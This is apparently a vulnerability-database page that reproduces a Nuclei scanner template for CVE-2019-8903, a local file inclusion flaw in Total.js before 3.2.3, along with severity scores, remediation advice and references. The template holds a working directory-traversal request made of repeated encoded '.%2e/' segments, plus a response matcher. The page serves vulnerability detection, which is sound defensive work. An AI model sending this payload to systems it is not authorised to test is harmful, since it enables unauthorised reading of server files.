Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2019-8903
HistoryApr 08, 2020 - 7:36 a.m.

Totaljs <3.2.3 - Local File Inclusion

2020-04-0807:36:36
ProjectDiscovery
github.com
1

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

0.013 Low

EPSS

Percentile

85.8%

Total.js Platform before 3.2.3 is vulnerable to local file inclusion.

id: CVE-2019-8903

info:
  name: Totaljs <3.2.3 - Local File Inclusion
  author: madrobot
  severity: high
  description: Total.js Platform before 3.2.3 is vulnerable to local file inclusion.
  impact: |
    An attacker can exploit this vulnerability to read sensitive files, execute arbitrary code, or launch further attacks.
  remediation: |
    Upgrade Totaljs to version 3.2.3 or later to fix the LFI vulnerability.
  reference:
    - https://blog.certimetergroup.com/it/articolo/security/total.js-directory-traversal-cve-2019-8903
    - https://github.com/totaljs/framework/commit/c37cafbf3e379a98db71c1125533d1e8d5b5aef7
    - https://github.com/totaljs/framework/commit/de16238d13848149f5d1dae51f54e397a525932b
    - https://nvd.nist.gov/vuln/detail/CVE-2019-8903
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2019-8903
    cwe-id: CWE-22
    epss-score: 0.01284
    epss-percentile: 0.85758
    cpe: cpe:2.3:a:totaljs:total.js:*:*:*:*:*:node.js:*:*
  metadata:
    max-request: 1
    vendor: totaljs
    product: total.js
    framework: node.js
  tags: cve2019,cve,totaljs,lfi,node.js

http:
  - method: GET
    path:
      - "{{BaseURL}}/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/var/www/html/index.html"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "apache2.conf"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100ffed96159f44d69d95da32f7f93c06c6fbf5e48c9f23b1173828ad2b4344f9bf022100f72dc9190a6a0d8685a9775ce37dd8c93c9c803a0132fedfc4fc7aadd95bac7d:922c64590222798bb761d5b6d8e72950

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

0.013 Low

EPSS

Percentile

85.8%